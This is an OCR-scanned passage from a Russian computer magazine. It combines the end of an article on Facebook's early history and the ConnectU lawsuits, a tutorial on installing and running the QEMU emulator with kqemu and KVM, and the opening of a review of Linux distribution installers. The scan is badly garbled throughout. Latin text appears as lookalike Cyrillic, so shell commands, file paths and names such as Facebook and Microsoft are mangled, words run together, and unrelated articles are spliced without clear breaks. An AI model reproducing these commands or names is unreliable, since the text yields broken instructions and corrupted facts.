Перспективность начинания стала очевидна быстро. Взрывной рости 
ажиотаж, вызванные сервисом, говорили лучше всякихслов. Молодая 
компания обзавелась собственным офисом в Пало-Альто, штат сотруд- 
ников активно расширялся и продолжает расти посей день. Словом, 
Марквнезапно оказался во главе компании-феномена, о которой 
говорили и писали все, а ведь, поамериканским меркам, он тогда даже 
не достиг совершеннолетия. 

В 2006 году ему стали поступать первые предложения о покупке. Сначала 
суммы были очень осторожные, нодовольно быстро началиувели- 
чиваться. Предлагали 750 миллионов долларов, но Маркотказался и 
заявил, что это втрое меньшетой суммы, о которой можно было бы вести 
серьезные обсуждения. Позже, на уже упомянутых переговорах сУаЬоо, 
речь шла о миллиарде, но Цукербергснова сказал «нет». Слухи утверж- 
дают, что было еще и предложение отОоодІе, и они давали больше, но 
РасеЬоок остался в прежних руках, а слухи остались слухами. 

Сайт, тем временем, обрастал нетолько людьми, но и новыми сервисами, 
какудачными.таки откровенно провальными. Всем в компании было 
ясно, что они сидят на огромных деньгах, но придумать изящные способы 
их получения от пользователей оказалось нетакой ужлегкой задачей. 

На сайте опробовали различные методы внедрения контекстной, как 
можно более щадящей, рекламы. Случались, в связи с этим, и скандалы, 
в частности, относящиеся к приватности данных (которая оказалась 
под большим вопросом) и невозможности окончательно удалить свой 
аккаунт. В общем, все закономерно — чем больше комьюнити.тем масш- 
табнее волнения. 

Годом перемен для РасеЬоок определенно стал 2007-й. Для начала 
Місгозо^ приобрел 1 .6% акций компании за сумму 240 млн. долларов. 
Несложно подсчитать, что в понимании МісгозоО: полная стоимость ком- 
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пании РасеЬоок равняется 1 5 миллиардам бумажек с портретами мерт- 
вых президентов. КудаужтутѴаЬоо и боодіе с их скромными суммами! 

Но деньги деньгами, а именно в прошлом году началось активное 
развитие самого сайта, сразу в нескольких направлениях. Официально 
открыли коды платформы всем желающим, так что каждый получил 
возможность создавать для сайта новые аппликухи, будьто игрушки, 
гороскопы, календари или что-то совершено иное. Кслову, теперь на 
сайт ежедневно добавляется 140 новых приложений. Были запущены 
сервис платных, виртуальных подарков и сервис РасеЬоок Веасоп, 
добавивший возможность публиковать у себя в профиле ссылки на 
какие-то продукты, купленные в магазинах партнерской сети. С пос- 
ледним вышел казус. Многие пользователи не горели желанием, чтобы 
система выставляла перечень их сетевых покупок на обозрение всех 
френдов. Какой-то бедолага даже умудрился заказать в инете обру- 
чальное кольцо, готовя сюрприз своей даме сердца, а она узнала о со- 
вершенной покупке, просматривая френдленту. Разумеется, сюрприз 
был испорчен. Ропот комьюнити нарастал, и в итоге, Марку пришлось 
приносить юзерам извинения в официальном блоге, признавая, что 
система недоработана. 

Но беда, как известно не приходит одна. Выждав более чем достаточно 
времени, бывшие коллеги Марка по проекту СоппесШ весной 2007, все 
же, подали в суд. Искот компании СоппесШ ккомпании РасеЬоок не 
сулил ничего хорошо. Именно в ходе этого разбирательства всплыли 
на свет веете подробности, что были описаны выше. Из недр забытья 
появиласьдаже личная электронная переписка, совсемуже неприятного 
характера. Например, оказалось, что в одном из последних писем Цукер- 
берг честно заявил, что просто надеялся на большее, искренне ожидал, 
что его примут в команду, когда вместо этого от него только требовали 
выкладываться по полной, но в качестве сооснователя проекта даже не 
рассматривали. Такчто, Марка и сооснователей РасеЬоок’а обвинили в 
нарушении копирайта, разглашении коммерческойтайны, нарушении 
контракта, злоупотреблении доверием, незаслуженном обогащении, 
нечестном ведении бизнеса, мошенничестве и других неприятных, но, 
похоже, вполнезакономерных вещах. 



Как ни странно, разрешилась ситуация благополучно. Суд протекал 
небыстро, в частности истцам дали дополнительное время для сбора 
доказательств, потому какадвокаты РасеЬоок’а камня на камне не 
оставили от предъявленных вначале улик. И вот, год спустя с начала 
процесса, в прессу просочились слухи отом, что конфликт близок к 
разрешению, и точно — вскоре было объявлено, что дело закрывается. 
Комментариев по этому поводу не последовало, сообщалось лишь, что 
стороны пришли ксогласию, а к какому именно и на какихусловиях, 
разглашено не было. На мой скромный взгляд, ответ напрашивается 
сам. Лишнеетому доказательство, новый исксо стороны СоппесШ, 
последовавший буквально сразу же за примирением. На этот раз братья 
Вин кл восс и Ди вия Нарендра усмотрели умышленное занижение 
стоимости РасеЬоок, которую им называли в ходе недавних перегово- 
ров. Апеллировали они, в основном, фактом сделки с МісгозоЛ и теми 
1 5 миллиардами, в которыетутже оценила компанию пресса. Пришлось 
снова объясняться и доказывать, что на мировом рынке компания стоит 
3.75 млрд., а эти 15, так — поводдля гордости, но не реальная сумма. В 
итоге, дело решили в пользу РасеЬоок, что произошло совсем недавно 
(летом 2008]. Новых исков пока не было. 

Как можно видеть, жизнь РасеЬоок’а бьет ключом. Цукербергуже прихо- 
дится стоять на передовой и пожинать не только лавры, но и все шишки, 
которых на молодую компанию сыплется немало. Что можно сегодня 
сказать про Марка какбизнесмена и видного ІТ-деятеля? Пожалуй, ниче- 
го конкретного. Даже эксперты расходятся во мнениях — одни называют 
РасеЬоок новым боодіе, а Цукерберга — заменой Пэйджу и Брину, другие 
высказываются очень осторожно, особенно после последнего судебного 
разбирательства и обвинения в воровстве идей. До сих пор не совсем 
ясно, что во всей этой истории было грамотным расчетом, а что — удачей 
и пойманной случайно волной. Наиболее частая характеристика Марка, 
звучащая изустбольшинства экспертов, критиков и сильных мира сего, 
сводится кодной фразе: «Он пока ещетакмолод». И сложно сэтим не 
согласиться: возраст Марка действительно мешает рассмотреть, кто 
же он такой — юный гений или просто очень везучий парень, которому 
благоволят обстоятельства. ИИ 
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В ВОЗМОЖНОСТИ ОЕМЫ 

ОЕМБ относится к программам, эмулирующим аппаратную среду. 
Основные функции аналогичны именитым ѴМѴѴаге, Ѵі гТиа ІВох, ВосЬз 
или ѴігТиаІ РС, хотя некоторые возможности отличаются. Например, 
поддерживается два вида эмуляции: 

• Риіізузіет етиіайоп — создается полноценная виртуальная машина, 
имеющая «свой» процессор и различную периферию; 

• ІІзег тосіе етиіаііоп — режим, поддерживаемый только в Ыпих. Он 
позволяетзапускать на родном процессоре программы, откомпилиро- 
ванные под другую платформу. 

Во втором варианте ОЕМІІ беретна себя всю заботу о переводе инструкций 
процессора и конвертации системных вызовов. Благодаря быстрому и 
компаетномудинамическомутранслятору кода, достигается высокая скорость 
эмуляции. В этом режиме возможна эмуляция нетолько х86, но и процессоров 
других архитектур: АПМ.ЗРАПС, РоѵѵегРС, МІРЗи т68к. Ксписку полной эму- 
ля ци и добавим еще х86_64 и ЕМ64Т. Работает ОЕМІІ на Ыпих, ЕгееВЗБ, Мае 
05Х, ЕгееБОЗ и ѴѴіпбоѵѵз [ѵѵѵѵѵѵ.Ь7.біоп.пе.]р/~деппи-ѵѵіп 1. В качестве основной 
платформы можно использовать компьютеры на базе х86, х86_64 и РоѵѵегРС. 
Впрочем, ограниченно поддерживаются и некоторые другие (БЕС Аірба, 
5РАРС32, АРМ, 5390]. Виртуальная машина І386-архитектуры, созданная при 
помощи ОЕМБ, получаетв свое распоряжение следующий набор устройств: 



мышь Р5/2 и клавиатура; 

2 РСІ ЮЕ интерфейса для жесткого диска и поддержку СБ-ПОМ; 

два дисковода; 

до 6 N Е2000 РСІ сетевых карт; 

до 4 последовательных (СОМ) портов; 

вывод звука через ЗоипбЫазІег 16 совместимую карту. 



• процессор такой же частоты, каки на основной системе; вЗМР-систе- 
мах возможна работа до 255 СРБ (поумолчанию 1 СРБ); 

• РС ВІ05, используемый в проекте Восбз; 

• материнская плата І440РХ с РІ 1X3 РСІ — І5А мостом; 

• видеокарта Сіггиз СБСБ 5446 РСІ ѴСА или ѴСА карта с Восбз ѴЕ5А 
расширениями; 



В последних версиях появилась долгожданная поддержка 115В и улуч- 
шен звук. Также стало возможно сетевое соединение между эмулируе- 
мыми ОС. 

По сравнению с другими известными виртуальными машинами, ОЕМБ 
работает достаточно шустро. Но есть еще модуль ОЕМБ Ассеіегаіюг 
Мосіи Іе (КОЕМ О, позволяющий выполнять часть кода напрямую на 
реальном процессоре, минуя виртуальный. Это неплохо ускоряет работу 
гостевой системы. Без этого модуля запуск виртуальной ОС замедляется 
примерно в пять раз. 

Сейчас КО ЕМ ІЭ доступен для ядер Ыпих-версий 2.6.x и 2.4.x (работает 
только на х86 и х86_64]. Есть порты под ЕгееВЗБ и ѴѴіпбоѵѵз, но они не- 
достаточно развиты. Ранее КОЕМБ распространялся по проприетарной 
лицензии с за крытым исходным кодом и только для Ыпих. Сегодня его 
код открыт под О N II СРБ, каки прочие компоненты ОЕМБ. 

Кроме того, в рамках проекта Ыпих КѴМ (Кегпеі-Ьазесі Ѵі гЕиа I 
МасЫпе] полным ходом идет разработка поддержки технологий 
аппаратной виртуализации (Іпіеі ѴТ и АМБ 5ѴМ] для х86- процес- 
соров I піеі и АМБ. Пока это патчи, позволяющие ОЕМІІ использовать 
возможности КѴМ. В будущем поддержка КѴМ будет реализована в 
основной ветке ОЕМІІ. 



ВЛАДИМИР «ТІІВВІЫА» ЛЯШКО 

(Ѵ.ТІІКВІЫА@СМАІІ_.СОМ) 
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Для эмуляции других архитектур вызывается отдельная утилита 



Н УСТАНОВКА ОЕМЫ 

Всем хорош ОЕМІІ, но есть один недостаток — документация проекта 
больше рассчитана на разработчиков. Нормальных инструкций для 
пользователя так мало, что их можно пересчитать по пальцам одной 
руки. Особенноучитывая, что в последних версиях изменился процесс 
установки и работы (хотя и незначительно]. На странице закачки предла- 
гаются исходные тексты, бинарная сборка для І_іпих и ссылки на пакеты 




для ВНЕІ_/РесІога и Зіаскѵѵаге, плюс порты ѴѴіпсІоѵѵз, ОрепЗоІагіз, Мае 05 
X и готовые образы систем. Для примера установим ОЕМЬ в ОЬипІа. Но 
все сказанное будет актуален о для ОеЬіап и в некоторой мере для других 
дистрибутивов. Проверяем, что доступно в репозитарии: 

$ зисіо арР-деР ирсіаРе 
$ зисіо арР-сасЬе зеагсЪ. дети 

Если подключен ІІпіѵегзе, — в ответполучаем списокприложений, в 



котором присутствует как сам эмулятор, так и некоторые утилиты для 
работы с ним. Смотрим, что за версию предлагают: 



$ зисіо арР-сасЬе зРюм дети I дгер -і ѵегзіоп 
Ѵегзіоп: 0 . 9 . 1-1иЬипРи1 



На моментнаписания статьи это был самый последний релиз. Инстал- 
лируем: 




В списке рекомендуемыхтакже значатся сІеЬооІзІгар, орепЬіоз-зрагс, 
орепбаскѵѵаге, ргоіі, збагибіз и ѵбе2. Теперь качаем с сайта проекта пос- 
ледние версии эмулятора и ускорителя и распаковываем архив с цети 
во временный каталоги в подкаталогархив с кцети. 

$ Раг х 2 ѵН дети- 0 .9.1. Раг . дт. 

$ ссі дети- 0 .9.1/ 

$ Раг хгѵН . . /кдети-1 . 4 . Оргеі . Раг . дг 

Если в системе присутствует ста рая версия эмулятора с модулем кцети, 
его желательно выгрузить: 

$ зисіо гішпосі кдети 

Конфигурируем: 

$ ./сопРідиге 

В результате получаем большой список параметров сборки. Среди них 
важны «ЗЬЬ зиррогр уез», который означает возможность запуска 
в графическом режиме, и «кдети зиррогр уез» — это поддержка уско- 
рителя. Теперь вводим «таке», а затем: «зисіо таке іпзРаІІ». 
Ускоритель кцети нужно собирать отдельно. Переходим в подкаталоге 
кдети и повторяем все сначала: 



$ зисіо арР-деР ІпзРаІІ дети 

Появится ОЕМІІ и при установке пакета кѵт. Списокзависимостей 
можно просмотреть командой «зисіо арР-сасЬе сіерепсіз дети». Мы 
же будем собирать его самостоятельно. Установка ускорителя КОЕМИ 
вынесена в отдельную операцию — как при установке при помощи паке- 
тов, таки при сборке из исходников. В первом случае вводим: 

$ зисіо арР-деР ІпзРаІІ кдети-соттоп 

При сборке с помощью пакетов проще не искатьзависимости вручную: 



$ ссі кдети-1 . 4 . Оргеі 
$ . /сопРідиге 

Если ошибокнет, то дальше выполняем обычную установку. Единствен- 
ный момент, который способен вызвать проблему, — отсутствие заго- 
ловочных файлов действующего ядра. Поэтому если в ответ получаешь 
«кдети саппоР Ье сотрііесі оп уоиг зузРет», доустанови хэдеры. 
По какой-то причине команда «зисіо арР-деР Ьиіісі-сіер кдети- 
соттоп» выдаетзапрос на установку только одного пакета сІраРсЬ. То 
есть, заголовочные файлы ядра в зависимостях не устанавливаются, 

ПОЭТОМУ ВВОДИМ: 



$ зисіо арР-деР Ьиіісі-сіер дети 



$ зисіо арР-деР ІпзРаІІ кегпе1-Ьеасіегз-$ (ипате -г) 



У меня былоустановлено 28 зависимостей. Кроме этого, эмулятор требу- 
ет для работы еще несколько пакетов: 

$ зисіо арР-деР ІпзРаІІ ЬосЬзЬіоз 1іЬазоипЬ2 ІіЬсб \ 
ІіЬпсигзезБ ІіЬзЫІ . 2ЬеЬіап ѵдаЬіоз 2 ІіЫд 



И — повторяем процедуру установки. Загрузить модуль не со «своим» 
ядром не получится, в ответ будет выдано сообщение «Іпѵаіісі тосіиіе 
РогтаР». 

Есть еще один нюанс. Если ранее по запросу был установлен дсс-3.4, то 
попытка выполнить «зисіо арР-деР ІпзРаІІ кдети-зоигее» при- 
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• В репозитариях 
дистрибутивов и на 
ітезЬтеаІ.пеІ можно 
найти несколько ре- 
шений, упрощающих 
создание виртуаль- 
ных машин. 

• Запуск І_іпих для 
процессоров АВМ в 
окружении СІЕМІІ: 

бгеатсаіюЬег 
ги/босз/ііпих агт 
дети.ЫтІ . 



Чтобы впредь не загружать его вручную, добавь «кдети» в 
/екс/тосіиіез. 

Возможно, в некоторых дистрибутивах, использующих 
ІЮЕѴ, к команде для запуска модуля понадобится добавить 
параметр «тарг=0»: 

$ зиСо тоСргоЪе кдети тазог=0 

А чтобы изменить параметры доступа, используй скрипты 
настройки 14 О ЕѴ. Например, в Еебога заносим файл /екс/ 
исіеѵ/регтіззіопз . с1/50-ис1еѵ . регшіззіопз строчку 
«кдети : гоок : гоок : 0 б б б ». 

В РАБОТА С ОЕМЫ 

Запустить ЫѵеСО-дистрибутив очень просто. Достаточно 
вставить диск в привод и ввести команду: 

$ дети -т 512 -ссігот /сіеѵ/ссігот 

Для виртуальной машины я выделил 512 Мб (по умолчанию 
— 1 28 Мб, но этого не всегда хватает]. Через некоторое 
время появится новое окно, в котором будет запущена ОС. 



$ дети -т 512 -ссігот ТіпуМе-2 0 08 . О . І586 . ізо 



Если при запуске эмулятора будет выдаваться сообщение о 
неактивности модуля крепли: «Соиісі пок ореп /сіеѵ/ 
кдети — ОЕМІІ ассеіегакіоп Іауег пок аскіѵакесі: 
Регтіззіоп Сепіей», то потребуется изменение прав на 
файл устройства /Сеѵ/кдети (поумолчанию 660 ): 

$ зиСо скипоС 666 /Сеѵ/ кдети 

Кстати, раньше нужно было создавать этот файл вручную 
при помощи команды «ткпоС /Оеѵ/кдети с 250 0». 
Теперь в этом нет необходимости. В некоторых системах 
эмулятор при запуске может потребовать перестроить 
параметры таймера высокого разрешения — «СоиІС пок 
сопкідиге /Оеѵ/гкс ко каѵе а 1024 Н 2 кітег. . . ». 
Тогда выполняем команду: 

$ зиСо зЪ. -с " ескю 1024 > /ргос/зуз/Сеѵ/гкс/ 
тах-изег-кгед" 



Консоль 

управления (^ЕМкГ 

(^ЕМИ предоставляет возможность управлять своей работой и получать 
информацию из специальной консоли. Чтобы ее вызвать, нажми комбинацию 
< СГГІ+ Ак+ 2 > . Теперь, используя разные команды (полный список которых 
доступен по Ьеір), можно добавить новое устройство, когда ОС уже загружена, 
сохранить (заѵеѵт имя_файла) или загрузить (Іоасіѵт) состояние виртуальной 
машины — и многое другое. Например, чтобы добавить СБ-КОМ, достаточно 
ввести «сЬапде ссігот /Сеѵ/сСгот». Использовав параметр іпіо, мыузнаем 
о режиме или состоянии того или иного компонента. Например, «іпко кдети» 
выведет режим, в котором находится модуль. Обратно в гостевую ОС можно 
вернуться, нажав < СГГІ+АК+ 1 > . 



В ІЛэипІш 8.04 по умолчанию его значение равно 64, но 
0ЕМ1Ч никогда нежаловался. Идем дальше. Для установки 
гостевой ОС сначала нужно создать виртуальный диск: 

$ дети-ітд сгеаке кезк-Сізк 4С 
Хотя можно сделать это и при помощи Об: 

$ СС ок=кезк-с1ізк Ьз = 1024 зеек=4194304 соипк = 0 

Правда, есть отличие: утилита сИ позволяет создать только 
гаѵѵ-образ, который представляет собой файл, заполнен- 
ный нулями. Утилита цети-ітд поддерживает несколько 
форматов, указать на которые можно при помощи пара- 
метра 1 -к 1 . Поумолчанию создаются цсоѵѵ-файлы (цети 
Сору Оп ѴѴгіке] . Этот формат поддерживает шифрование 
(АЕ5, 1 28 бит] и компрессию, но возможны еще гаѵѵ, соѵѵ 
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(ІІзег Мосіе Ыпих), ѵтсік (ѴМѴѴаге) или сіоор (сжатый Іоор, 
обычно используемый на ЫѵеСО]. Многие предпочитают 
использовать гаѵѵ. Этот формат не поддерживает сжатие, 
но если образ находится на разделе с файловой системой, 
поддерживающей дыры (Ьоіез), например ех{2/3,то сжатие 
будет обеспечено драйвером ФС. И у этого способа есть еще 
один несомненный плюс — можно монтировать в дерево ФС 
и работать какс обычным дисковым разделом. Использо- 
вав параметр іпію, можно получить информацию о готовом 
образе. 

Утилита дети-ітд поддерживает параметр сопѵегС поз- 
воляющий преобразовывать образы из одного формата в 
другой: 



$ дети-ітд сопѵегк — 1 ссж соѵѵітаде . ссж ітаде.гаѵѵ 



Теперь запустим виртуальную маши ну уже с жестким 

ДИСКОМ: 



$ дети -Ма Сезк-сіізк -с<±гот \ 

иЪипки-8 . 04-йезкСор-іЗ 86 . 15о\ 
-т 512 -Ъоок <3. -Іосаікіте 



Эмулятор поддерживает до четырех виртуальныхжестких 
дисков, которые обозначаются аналогично линуксовым от 
Ма до Мб, и 2 флоппи-диска — Ма и МЬ. Но использовать 
1 -Мс 1 и 1 -сйгош 1 одновременно нельзя. Если использу- 
ется только один образ диска, параметр Ма можно опустить: 



$ дети Сезк-сіізк 



Параметр ' -Ъоок 1 также, каки в реальной машине, позво- 
ляетуказать приоритетзагрузки. Доступно четыре варианта: 



• ЪооС а — загрузка с виртуального флоппи; 

• ЪооС с — загрузка с жесткого диска (по умол- 
чанию) ; 

• ЪооС (1 — загрузка с СБ-КОМ; 

• ЪооС п — сетевая (ЕМегЪооС) загрузка. 

Параметр 1 -ІосаІСіте' позволяетуказать на использо- 
вание локального времени в виртуальной машине. 

Теперь обычным образом устанавливаем операционную сис- 
тему на жесткий диск и после перезагрузки используем уже: 

$ дети Сезк-сіізк -т 512 -Іосаікіте 

Чтобы виртуальная система стартовала сразу в полноэкран- 
ном режиме, добавь ключ 1 -Тиіі-зсгееп 1 ; переключе- 
ние производится при помощи комбинации <СМ+АІ1+Е>. В 
некоторых гостевых ОС, возможно, потребуется отключить 
АСРІ флагом 1 -по-асрі 1 . 

В зависимости отустановок родительской ОС, в процессе 
запуска иногда появляется сообщение отом, что эмулятор 
не может получить доменное имя. Самым простым выходом 
будет добавить опцию 1 -Ошшпу-пеС 1 , активирующую 
поддельный сетевой стек. Но при этом гостевой системой не 
будут приниматься и отправляться пакеты: 

$ дети -сІитту-пеС -ссігот /сіеѵ/ссігот 

Н ПРОДВИНУТЫЕ ВОЗМОЖНОСТИ 

Поумолчанию эмулируется одно ядро. Чтобы увеличить 
число процессоров, используем параметр ' -зтр' с 
указанием их количества. Правда, в некоторых случаях это 




Консольуправления ОЕМІЭ 



приводит кзамедлению эмуляции, да и пытаться создать 
несколько виртуальных процессоров на компьютере с 
одним СРІЭ бессмысленно. 

При запуске цети эмулируетту же аппаратную среду, в 
которой он запускается. При запуске на І386 будет«под- 
ражать» І386, на х86_64 — 64-битной системе. На РоѵѵегРС 
будетзапущен еще один РоѵѵегРС -компьютер и т.д. Когда 
не обходима эмуляция системы отличной архитектуры, 
то запускаем специальную версию утилиты. Доступные 
варианты можно найти, набрав в консоли цети и нажав 
табуляцию в Ьазб (цети-5у5І;епп-ррс, цети-зузіет-зрагс 
и другие). Помимо стандартных РС и І5А РС (без шины РСІ), 
ОЕМІІ может эмулировать и другие аппаратные платформы, 
несвязанные с персональным компьютером —такие, как 
АРМ Ѵегзабіе или платы на основе МІР5. Вывести полный 
список поддерживаемых платформ можно при помощи 
ключа 1 -м ? 1 . Чтобы изменить платформу рс на ІЭА-опІу 
РС, достаточно набрать: 

$ дети -М ізарс -Ма Сезк-сіізк -т 512 

По умолчанию звуковая система не активируется. Придется 
это сделать самостоятельно, добавив 1 -епаЫе-аийіо 1 . 
Получить список поддерживаемых аудиоподсистем можно 
при помощи параметра 1 -аийіо-кеір 1 , а списокзвуко- 
выхкарт— 1 -зоипсШѵѵ ? 1 . Самое простое — это активиро- 
вать все звуковые драйверы: 

$ дети -зоиММ аіі -Ма Сезк-сіізк 

Модуль кцети может работать в двух режимах: «Іог изег 
сосіе»и«1ог изег аМ кегпеі сосіе». Первый режим 
устанавливается поумолчанию, и его использование 
проблем не вызывает (если при запуске ОС в этом режиме 
возникли проблемы — можно, чтобы не выгружать модуль 
кцети, просто отказаться отего использования при помощи 
параметра 1 -по-кдети '). Второй режим — более быст- 
рый и активируется при помощи ключа 1 -кегпеі-кдети 
1 . Но учти, с некоторыми гостевыми ОС он не дружит. Кроме 
того, скорость работы зависит от версии ядра гостевой 
системы и нескольких других параметров. 

Для поднятия виртуального сетевого ІарЛип-интерфейса (в 




> ІП^О 

Автор ОЕМІІ — фран- 
цузский программист 
Фабрис Беллар, 
создатель попу- 
лярной библиотеки 
ІіЬаѵсосІес, на базе 
которой были созда- 
ны такие программы, 
как ЕЕтред, МзМѵѵ, 
МРІауег, ѴібеоЕАЫ 
и др. 

• ОЕМІЭ может рабо- 
тать в двух режимах: 

как полноценная 
виртуальная машина 
или какмашина, поз- 
воляющая запускать 
программы, отком- 
пилированные под 
другую платформу. 

• ОЕМІЭ поддержи- 
ваетуправление по 
протоколу ѴІ\ІС. 
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ядре должен быть включен параметр СО N РІ 0_ТУ N ) цети по умолчанию 
использует скрипт /екс/дети-ікир. Если таковой не обнаруживается, 
то эмулятор самостоятельно выбирает параметры. В простейшем случае 
скрипт /екс/дети-ікир выглядиттак: 

# ! /Ьіп/зЬ 

зисіо /зЪіп/іксопкід $1 192.168.0.100 
Теперьделаем скриптисполняемым (сіітосі +х] и запускаем эмулятор: 

$ реши кезк-сіізк -пек піс,ѵ1ап=0 -пек кар,ѵ1ап=0 
Первая часть команды (-пек піс, ѵ1ап=0) создаст сетевую карту в 




Оетиіаіюг — удобная программа для работы с ОЕМЭ 



Работа через КѴМ 

фЕМЕГ может использовать для работы КѴМ. При этом не требует- 
ся кдети и наблюдается хорошая производительность. Для начала 
проверим поддержку этой технологии ядром: 

$ едгер ' л к1адз . * (ѵшх I зѵш) ' /ргос/сриіпко 

В современных дистрибутивах она обычно присутствует, так что 
делать ничего не придется. Устанавливаем пакет кѵш (дети уже 
есть) . Загружаем нужный драйвер. У меня А1ѴГО, поэтому: 

$ зисіо тосіргоЬе кѵт-атсі 

Если проц от Іпіеі, то: 

$ зисіо тосіргоЬе кѵт-іпкеі 

А дальше уже создаем виртуальные машины обычным образом. 

► 098 



виртуальной машине, подключив ее к виртуальной сети 0, вторая (-пек 
кар, ѵ1ап=0] подниметіар-интерфейс на хост компьютера и подклю- 
чит его к виртуальной сети 0. Адрес для Іа р-и интерфейса будет взят из 
/екс/дети-ікир. Адрес сетевой карты настраивается стандартными 
средствами гостевой ОС и должен находиться в той же подсети, что и Іар 
(например, 192.168.0.101). Аналогичным образом можно добавить любое 
количество сетевых карт. Параметр 1 -тасасМг 1 позволяетзадать 
МАС-адрес первого сетевого интерфейса. МАС-адреса остальных будут 
инкрементированы автоматически. 

Если на основной системе установлен 5атЬа-сервер,то гостевая систе- 
ма можетобщаться с основной через расшаренные ресурсы. Для этого 
используется замечательная опция '-зшЬ' суказанием каталога: 

$ дети кезк-сіізк — зтЬ /тпк/дети -пек піс,ѵ1ап=0 -пек 
кар, ѵ1ап=0 

Аналогично можно активировать и встроенный ІЙр-сервер, добавив 
при запуске команду «-кккр каталог». При этом все файлы, находя- 
щиеся в указанном каталоге, могут быть за гружены на гостевую систему. 
Обменяться информацией между основной и гостевой системами можно 
и через перенаправление. Форматтакой: «-гесііг [ксріисір] :Ьозк- 
рогк : [диезк-Ьозк] : диезк-рогк». Запускаем эмуляцию с этой опцией: 

$ дети кезк-сіізк -гесііг кср:1234: : 2 3 

Теперь пробуем подключиться кіеіпеі-порту на гостевой системе: 

$ кеіпек ІосаІЬозк 1234 

В ПРОСТО И ФУНКЦИОНАЛЬНО 

Как видишь, ОЕМЮ достаточно простая в использовании и многофунк- 
циональная система виртуализации, позволяющая эмулировать 
системы различных архитектур и запускать приложения, собранные под 
другие операционные системы. Она нетребует предварительной на- 
стройки и подготовки, а сам процесс от компиляции до запуска занимает 
минимум времени. И-И 



Графические 

тулзы 

Управление фЕМІІ производится исключительно из командной 
строки. Упростить задачу можно при помощи скриптов, записав 
все команды в файл. В Сети реально найти десяток проектов, пред- 
лагающих различные интерфейсы. Название одного из проектов 
совпадает с именем модуля — КфЕМІІ Гкдети.зЕпеН . С его помо- 
щью можно легко настроить виртуальный ПК, просто выбирая 
нужное из меню, как это делается в ѴМѴѴаге. В КфЕМІІ доступен 
выбор и монтирование дисков, настройка сети, создание скриптов 
для запуска настроенной виртуальной машины из командной 
строки. Еще одно решение — (^1:Ети Гдгети.огф) — построено 
на (^-библиотеках. Оно будет полезно тем, кто хочет, не рискуя, 
протестировать новую ОС. В Оетиіаіюг ( детиІаГог.сгеаГеѵѵеЬ.сІе) 
доступен удобный мастер создания виртуальных машин. Есть в 
этом списке и веб-интерфейс, предлагаемый проектом Оетисіо 
Гдетибо.зГ.пеЕ) . С его помощью можно создавать машины и уда- 
ленно управлять многочисленными ѴМ. 

Эти и некоторые другие приложения есть в репозитариях дистри- 
бутивов. Например, можно установить несколько решений, введя 
віЛліпШ: 

$ зисіо арк-дек іпзкаіі деши-ІаипсЬег дкеши дешиіаког дешискі 
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Туке — птица «высокого полета», и иногда она летит столь высоко, что не за- 
мечает обычных пользователей. В этой статье мы рассмотрим процесс при- 
ручения пингвинов трех разных пород — Рейога 9, іЛэипШ 8.04 и орепЗІІЗЕ 
11. Все они достаточно популярны и в представлении не нуждаются. Выбе- 
рем пингвина, который без проблем приживется на твоем компе. 



се дистрибутивы мы попытаемся настроить за 10 или 
меньше шагов. Подробно рассматривать установку І_іпих 
не станем, но поговорим о некоторых нештатных ситуаци- 
ях, с которыми пользователю придется столкнуться при 
установке. Устанавливаться дистрибутивы будут на следующую машину: 
АІѴЮ АОзІоп 64X2 Оиаі 4200+ (2.2 ГГц], 2 Гб ОЗУ (двухканальный режим], 
ЮЕ-винчестер Ѵ\Ш 160 О В , видео АТІ Вайеоп Хргезз 1250, монитор Асег 
АІ_1916. Начнем. 

Н РЕООРА9 

От девятой версии я ожидал большего. И от ее инсталлятора тоже. Что 
ни говори, а он — лицо дистрибутива. По нему встречают... Но обо всем 
по порядку. На часах 6:37 утра, начинаюустановку девятой Федоры ( на- 



верное , это тот самый случай, когда увлеченность перерас- 
тает свои границы, — Прим. ред.]. Дисктихонько шуршит в приводе, 
и, чтобы сэкономить время, я пропускаю проверку поверхности диска 
(стандартная фишка Федоры]. 

Сначала все шло какобычно — выбор языка, раскладки. Потом 
наступила очередь настройки загрузчика. Очень не понравилось, что 
инсталлятор не заметил Мапйгіѵа 2008, установленную в другом разделе 
(наверное, Мандрива оказалась недостойной его внимания]. Поэтому 
Федора создала в меню О РІО В только два пункта — для ѴѴіпсІоѵѵз, обозвав 
ее ООзег, и для себя любимой — Еейога. 

Выбор пакетов в Федоре — занимательная штука. Неужели нельзя было 
научить инсталлятор подсчитывать, сколько будут занимать выбранные 
пакеты на жестком диске? Например, я собрался устанавливать Ыпих 
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[Программа разметки (Лэипіи очень медленная 




на раздел объемом 3,7 Гб. К обжорам дискового пространства, вроде 
Висты, І_іпих никогда не относился, но все же, было бы нелишним знать, 
сколько места останется после установки. Мне показалось, что 3,7 Гб 
будет маловато, поэтому, чтобы отключить некоторые ненужные мне 
программы и библиотеки, я указал «самостоятельный выбор пакетов». 
Лучше бы я этого не делал! Только я перешел в группу «Приложения», 
как появилось симпатичное окошко, сообщающее, что произошла 
исключительная ситуация, и теперь мне придется прекратить установку 
и начать все заново. Делать нечего, нажимаю ПезеЕ На второй раз я уже 
отказался от самостоятельного выбора пакетов, и процесс завершился 
успешно — 933 пакета поместились на жесткий диск. В 7:01 инсталлятор 
извлекдиск из привода, и компьютер перезагрузился. Но это еще не 
все! Если ты когда-нибудь устанавливал Федору, то знаешь о втором 
этапе установки: нужно прочитать лицензионное соглашение, добавить 
пользователя, установить дату и часовой пояс. Якобы система уже 
установлена, и эти действия не нужно включать в «общую смету». Как 
бы ни так! 

При перезагрузке Федора неправильно определила разрешение мони- 
тора, и в результате я не видел кнопки «Назад» и «Далее». Пришлось, 
чтобы перейти на следующий этап настройки, использовать <ТаЬ> и 
<Еп1:ег> наугад. Самое интересное началось, когда понадобилось ввести 
имя пользователя и его пароль. По умолчанию была активирована 
русская раскладка, и я никак не мог переключиться на английский язык. 
Перепробовал все комбинации: <СМ+5Ы1і:>, <5ЫК+5ЫК>, <АИ:+5Ы1і:>, 
<Сарз Иосіо, левый/правый <С1х1>. Пытаясь сэкономить время, добавил 
пользователя с именем 1 и паролем 1 23456. Система предупредила, что 
такое «имя» нежелательно, но другого выбора у меня не было. С горем 
пополам я установил Федору. На часах — 7:07. Установка девятой версии 
Федоры заняла ровно 30 минут. Неплохой вроде бы результат, но, как я 
уже отмечал, инсталлятору меня симпатий не вызвал. 



* 



Линіи 

Настройка СБИ-соединения в орепЗІІЗЕ 



поразмыслив, инсталлятор предложил мнеурезать мои основной раздел 
со всеми самыми ценными данными. М -да, хороший вариант, ничего 
не скажешь. Я выбрал ручную разметку и еще две минуты созерцал ин- 
дикатор «Просмотра дисков». Наконец, появилосьокошко программы, 
